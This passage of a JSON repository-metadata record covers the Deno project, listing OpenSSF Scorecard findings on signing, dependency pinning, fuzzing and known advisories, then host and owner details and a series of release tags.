settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/release